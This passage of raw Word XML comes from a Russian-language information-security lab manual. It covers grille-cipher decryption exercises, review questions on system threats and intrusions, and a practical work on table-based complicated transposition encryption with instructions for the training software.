      </w:r>
      <w:r>
        <w:t>4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>– если в строке 24 символа то следует выбрать таблицу 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>5 (Символ в центре таблицы не учитывается);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>– если в строке 36 символов то следует выбрать таблицу 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Также на этом этапе можно воспользоваться подсказкой «Показать размер таблицы» (двойным нажатием левой клавиши мыши).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>6.3. Выбирая положение вырезов маски на заполненной таблице, надо подобрать такую маску, при которой дешифрованная информация в нижней строке приобретет смысл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выборе очередного выреза маски в таблице автоматически затеняются те клетки, которые уже не могут быть использованы в качестве вырезов из-за того, что выбранные вырезы отображаются на них при повороте решетки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Одновременно с этим в нижней строке отображаются в соответствующих позициях символы, которые попадут в указанные вырезы при всех поворотах решетки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="bodytext2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После того как вы выбрали маску, нажмите «Результат».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Программа проверит соответствие правильность дешифрования и выдаст соответствующее сообщение: “Дешифровано правильно” если была найдена правильная маска или “Ошибка дешифрования”. Если дешифровано было не правильно, то будет показана правильная маска шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При дешифровании информации можно воспользоваться следующими подсказками:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="bodytext2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«Показать первый символ в шифровке» («Показать следующий символ в шифровке»);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="bodytext2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«Показать первый вырез в маске» («Показать следующий вырез в маске»);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="bodytext2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«Показать кодовую маску»;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="bodytext2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«Показать весь расшифрованный текст».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>7. Выполнение практической части «Дешифрование» в режиме «С оценкой».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполняется так же, как и в режиме «Без оценки», но в конце выполнения практической части будет выставлена оценка, исходя из количества полученных подсказок и веса этих подсказок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </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pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что понимают под угрозой безопасности АСОИ? Перечислите типы угроз безопасности АСОИ.</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что такое уязвимость АСОИ?</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Какие случайные воздействия на систему вы знаете?</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pacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Что такое «Маскарад»?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что такое пассивное вторжение?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что такое активное вторжение?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Выполнить практическую часть «Дешифрование» в режиме «С оценкой».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Выполнить практическую часть «Дешифрование» в режиме «С оценкой» - отлично.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="l3"/>
      <w:bookmarkEnd w:id="110"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Практическая работа №3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шифрование информации методом усложненной перестановки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>по таблице</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Цель работы:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> изучение алгоритма шифрования информации методом усложненной перестановки по таблице и освоение приемов дешифрования информации, зашифрованной данным методом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Теоретическое обоснование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Работа направлена на изучение шифрования информации методом усложненной перестановки по таблице. Рассматриваемый метод относится к группе блочных шифров, то есть информация в этом алгоритме обрабатывается блоками, по несколько символов (байт) одновременно. Как явствует из названия, в основе данного метода лежит занесение информации в ячейки специальной таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Метод усложненной перестановки отличается наличием в таблице «вырезанных» ячеек, в которые ввод информации запрещен. Таким образом, зашифрование информации по методу усложненной перестановки по таблице можно представить как последовательность из трех этапов: занесение шифруемых данных в прямоугольную таблицу по строкам, причем в некоторые ячейки ввод запрещен – они должны остаться пустыми; перемешивание столбцов таблицы в соответствии с ключом перестановки; считывание шифрограммы из перемешанной таблицы по столбцам, при этом пустые ячейки игнорируются. В итоге зашифрованное сообщение оказывается защищено тремя ключами: к размерности таблицы и ключу перестановки добавляется ключ, определяющий положение запрещенных ячеек в исходной таблице.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Расшифрование полученной шифрограммы осуществляется в порядке, обратном зашифрованию. В таблицу, столбцы которой перемешаны в соответствии с ключом перестановки, зашифрованное сообщение заносится по столбцам, после чего восстанавливается порядок столбцов и из полученной исходной таблицы по строкам считываются расшифрованные данные.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Очевидно, что в процессе шифрования все шифруемое сообщение может не уместиться в одной таблице. В этом случае шифруемые данные должны быть разбиты на части (блоки), каждая из которых целиком заполняет таблицу и, следовательно, может быть зашифрована независимо от других частей. Единственная проблема, которую остается решить, это как определить конец зашифрованного сообщения, если данные не укладываются в целое число таблиц. Для этой цели предлагается использовать специальный символ (признак конца данных), не употребляющийся в шифруемом сообщении. Остаток таблицы после признака конца данных должен быть заполнен произвольными символами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Методика и порядок выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Сразу после запуска программного продукта «Шифрование информации методом усложненной перестановки по таблице» В верхней части расположено главное меню, состоящее из двух пунктов – «Помощь» и «Вернуться». Выбрав пункт «Помощь», можно получить справочную информацию по работе с системой. При выборе пункта «Вернуться» завершается работа и происходит переход на главный экран учебника-оболочки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ниже расположен набор из трех закладок: «Теория», «Шифрование» и «Дешифрование».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Изначально доступна только одна из них – «Теория», содержащая теоретический материал по изучаемому методу шифрования. Теоретический материал разбит на три части, которые открываются последовательно одна за другой при нажатии на кнопку «Следующий» во вкладке «Теория». Только прочитав все три части и нажав кнопку «Изучено», Вы можете перейти к выполнению практической части занятия, содержащейся на вкладках «Шифрование» и «Дешифрование».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>После выбора одной из двух вкладок «Шифрование» или «Дешифрование» на экране отображается окно практической части занятия, состоящее из следующих частей: главное меню, панель управления, центральная панель, в которой собственно и выполняются основные действия при работе, статусная строка. В самом начале на панели управления доступны только кнопка «Старт» и флажок для выбора режима тестирования (режим с учетом оценки или режим тренировочного тестирования). В центральное окно панели выводится приглашение к началу тестирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В режиме тестирования с оценкой ведется контроль за выполнением задания и в конце работы выставляется оценка, которая фиксируется в журнале электронного учебника. В режиме тренировочного тестирования оценка не подсчитывается, вместо этого имеется возможность получить подсказку или увидеть правильное решение поставленной задачи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«Шифрование».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Процесс шифрования включает в себя две части: зашифрование информации по методу усложненной перестановки по таблице и расшифрование информации, зашифрованной таким способом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Выбрав режим тестирования, нажмите кнопку «Старт». В результате Вам будет выдано задание на зашифрование – некая фраза, и таблица, с помощью которой необходимо эту фразу зашифровать..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Следует отметить, что текст задания размещен в ячейках специальной таблицы в верхней части центральной панели, что облегчает его прочтение и выявление пробелов. Ниже расположена автоматически сформированная таблица, с помощью которой предстоит зашифровать текст задания. Некоторые ячейки этой таблицы закрыты значками «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stop</w:t>
      </w:r>
      <w:r>
        <w:t>», ввод данных в них запрещен. Курсор расположен в первой доступной ячейке таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">С помощью клавиатуры заполните предложенную Вам таблицу по строкам. При вводе в ячейку таблицы очередного символа курсор переводится в следующую доступную ячейку, тем самым процесс заполнения таблицы по строкам выполняется полуавтоматически, причем в каждой ячейке таблицы будет располагаться не более одного символа. При вводе в таблицу исходного </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>текста внимательно следите за регистром символов, а также за правильной расстановкой знаков препинания и пробелов. В случае ошибки вернитесь к предыдущим ячейкам с помощью кнопок «стрелка вправо» и «стрелка влево» на клавиатуре компьютера и повторите ввод. Как только первая таблица будет полностью заполнена, автоматически будет добавлена еще одна, в которой Вы сможете завершить ввод задания. Просмотреть все заполненные таблицы можно с помощью кнопок «Предыдущая» и «Следующая», находящихся внизу центральной части экрана.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Завершив занесение всего текста в таблицы, необходимо ввести символ «тильда» (~), который в данном случае служит признаком конца данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнив все действия по заполнению таблицы, нажмите кнопку «Результат» на панели управления. В итоге будет проведена проверка правильности заполнения таблиц и выдано соответствующее сообщение. В случае наличия ошибок Вам будет указана таблица и ячейка, в которой находится первая из допущенных ошибок. Если ошибки отсутствуют, произойдет переход ко второму этапу зашифрования – перестановке столбцов. Обратите внимание, что все пустые (желтые) клетки последней таблицы при переходе ко второму этапу автоматически заполняются «мусором».</w:t>
      </w:r>
    </w:p>
